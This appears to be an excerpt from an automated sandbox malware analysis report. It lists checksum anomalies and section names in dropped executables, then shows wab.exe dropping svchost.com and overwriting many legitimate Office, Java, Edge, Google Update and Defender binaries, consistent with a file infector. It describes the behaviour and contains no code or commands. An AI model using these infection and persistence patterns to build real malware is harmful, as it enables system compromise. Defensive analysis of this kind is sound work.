              Source: SDXHelper.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x38c81
              Source: upx.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x5c64b
              Source: VC_redist.x64.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0xaff0b
              Source: Au3Check.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x4ace1
              Source: GoogleCrashHandler.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x60b44
              Source: sscicons.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x2bad0
              Source: armsvc.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x38ee8
              Source: AppVLP.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x710ec
              Source: GoogleCrashHandler64.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x739bf
              Source: Integrator.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x44ae38
              Source: Microsoft.Mashup.Container.Loader.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x218c6
              Source: AppSharingHookController.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x25428
              Source: AutoIt3Help.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x2942f
              Source: Uninstall.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x1d811
              Source: officeappguardwin32.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x1ea61e
              Source: jusched.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0xc76e3
              Source: AppVDllSurrogate32.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x3d892
              Source: Wordconv.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x1f925
              Source: jucheck.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x138baf
              Source: OcPubMgr.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x182a45
              Source: chrome.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x2c9d6
              Source: accicons.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x4235e8
              Source: VSTOInstaller.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x23068
              Source: misc.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x109391
              Source: ai.exe0.8.drStatic PE information: real checksum: 0x8a074 should be: 0xa200f
              Source: MpDlpCmd.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x74f87
              Source: java.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x5013a
              Source: SciTE.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x25609f
              Source: MpCopyAccelerator.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x3e54a
              Source: ConfigSecurityPolicy.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x8624f
              Source: integrator.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x44ae38
              Source: Aut2exe.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x1997a9
              Source: OLicenseHeartbeat.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0xb8fc4
              Source: AutoIt3_x64.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x11706f
              Source: joticon.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0xbd8e2
              Source: grv_icons.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x646fd
              Source: GoogleUpdateComRegisterShell64.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x3898a
              Source: AppVDllSurrogate.exe.8.drStatic PE information: section name: .didat
              Source: msoev.exe.8.drStatic PE information: section name: .didat
              Source: OcPubMgr.exe.8.drStatic PE information: section name: .didat
              Source: officeappguardwin32.exe.8.drStatic PE information: section name: .didat
              Source: AppVDllSurrogate32.exe.8.drStatic PE information: section name: .didat
              Source: OfficeScrBroker.exe.8.drStatic PE information: section name: .didat
              Source: AppVDllSurrogate64.exe.8.drStatic PE information: section name: .didat
              Source: OfficeScrSanBroker.exe.8.drStatic PE information: section name: .didat
              Source: AppVLP.exe.8.drStatic PE information: section name: .didat
              Source: Integrator.exe.8.drStatic PE information: section name: .didat
              Source: Microsoft.Mashup.Container.Loader.exe.8.drStatic PE information: section name: .didat
              Source: AppSharingHookController.exe.8.drStatic PE information: section name: .didat
              Source: Common.DBConnection.exe.8.drStatic PE information: section name: .didat
              Source: PerfBoost.exe.8.drStatic PE information: section name: .didat
              Source: SDXHelper.exe.8.drStatic PE information: section name: .didat
              Source: MpCmdRun.exe.8.drStatic PE information: section name: .didat
              Source: MpDlpCmd.exe.8.drStatic PE information: section name: .didat
              Source: mpextms.exe.8.drStatic PE information: section name: .didat
              Source: MsMpEng.exe.8.drStatic PE information: section name: .didat
              Source: NisSrv.exe.8.drStatic PE information: section name: .didat
              Source: MpCmdRun.exe0.8.drStatic PE information: section name: .didat
              Source: VC_redist.x64.exe.8.drStatic PE information: section name: .didat
              Source: integrator.exe.8.drStatic PE information: section name: .didat
              Source: ConfigSecurityPolicy.exe.8.drStatic PE information: section name: .didat
              Source: MpCopyAccelerator.exe.8.drStatic PE information: section name: .didat
              Source: UcMapi.exe.8.drStatic PE information: section name: .didat
              Source: Wordconv.exe.8.drStatic PE information: section name: .didat
              Source: ai.exe.8.drStatic PE information: section name: .didat
              Source: aimgr.exe.8.drStatic PE information: section name: .didat
              Source: chrome.exe.8.drStatic PE information: section name: .didat
              Source: Au3Check.exe.8.drStatic PE information: section name: .didat
              Source: Au3Info.exe.8.drStatic PE information: section name: .didat
              Source: Au3Info_x64.exe.8.drStatic PE information: section name: .didat
              Source: Aut2exe.exe.8.drStatic PE information: section name: .didat
              Source: Aut2exe_x64.exe.8.drStatic PE information: section name: .didat
              Source: upx.exe.8.drStatic PE information: section name: .didat
              Source: AutoIt3Help.exe.8.drStatic PE information: section name: .didat
              Source: ai.exe0.8.drStatic PE information: section name: .didat
              Source: aimgr.exe0.8.drStatic PE information: section name: .didat
              Source: OLicenseHeartbeat.exe.8.drStatic PE information: section name: .didat
              Source: AppSharingHookController64.exe.8.drStatic PE information: section name: .didat
              Source: AutoIt3_x64.exe.8.drStatic PE information: section name: .didat
              Source: SciTE.exe.8.drStatic PE information: section name: .didat
              Source: Uninstall.exe.8.drStatic PE information: section name: .didat
              Source: AdobeARMHelper.exe.8.drStatic PE information: section name: .didat
              Source: armsvc.exe.8.drStatic PE information: section name: .didat
              Source: jaureg.exe.8.drStatic PE information: section name: .didat
              Source: jucheck.exe.8.drStatic PE information: section name: .didat
              Source: jusched.exe.8.drStatic PE information: section name: .didat
              Source: VSTOInstaller.exe.8.drStatic PE information: section name: .didat
              Source: SQLDumper.exe.8.drStatic PE information: section name: .didat
              Source: accicons.exe.8.drStatic PE information: section name: .didat
              Source: dbcicons.exe.8.drStatic PE information: section name: .didat
              Source: grv_icons.exe.8.drStatic PE information: section name: .didat
              Source: joticon.exe.8.drStatic PE information: section name: .didat
              Source: lyncicon.exe.8.drStatic PE information: section name: .didat
              Source: misc.exe.8.drStatic PE information: section name: .didat
              Source: osmclienticon.exe.8.drStatic PE information: section name: .didat
              Source: outicon.exe.8.drStatic PE information: section name: .didat
              Source: java.exe.8.drStatic PE information: section name: .didat
              Source: javaw.exe.8.drStatic PE information: section name: .didat
              Source: javaws.exe.8.drStatic PE information: section name: .didat
              Source: GoogleCrashHandler.exe.8.drStatic PE information: section name: .didat
              Source: GoogleCrashHandler64.exe.8.drStatic PE information: section name: .didat
              Source: GoogleUpdate.exe.8.drStatic PE information: section name: .didat
              Source: GoogleUpdateBroker.exe.8.drStatic PE information: section name: .didat
              Source: GoogleUpdateComRegisterShell64.exe.8.drStatic PE information: section name: .didat
              Source: GoogleUpdateCore.exe.8.drStatic PE information: section name: .didat
              Source: GoogleUpdateOnDemand.exe.8.drStatic PE information: section name: .didat
              Source: pj11icon.exe.8.drStatic PE information: section name: .didat
              Source: pptico.exe.8.drStatic PE information: section name: .didat
              Source: pubs.exe.8.drStatic PE information: section name: .didat
              Source: sscicons.exe.8.drStatic PE information: section name: .didat
              Source: visicon.exe.8.drStatic PE information: section name: .didat
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8A756B push ebx; iretd 2_2_00007FFD9B8A756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8A74FB push ebx; iretd 2_2_00007FFD9B8A756A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07B408C2 push eax; mov dword ptr [esp], ecx5_2_07B40AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07B40AB8 push eax; mov dword ptr [esp], ecx5_2_07B40AC4

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Windows\svchost.comJump to dropped file
              Drops executable to a common third party application directory
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Infects executable files (exe, dll, sys, html)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to behavior
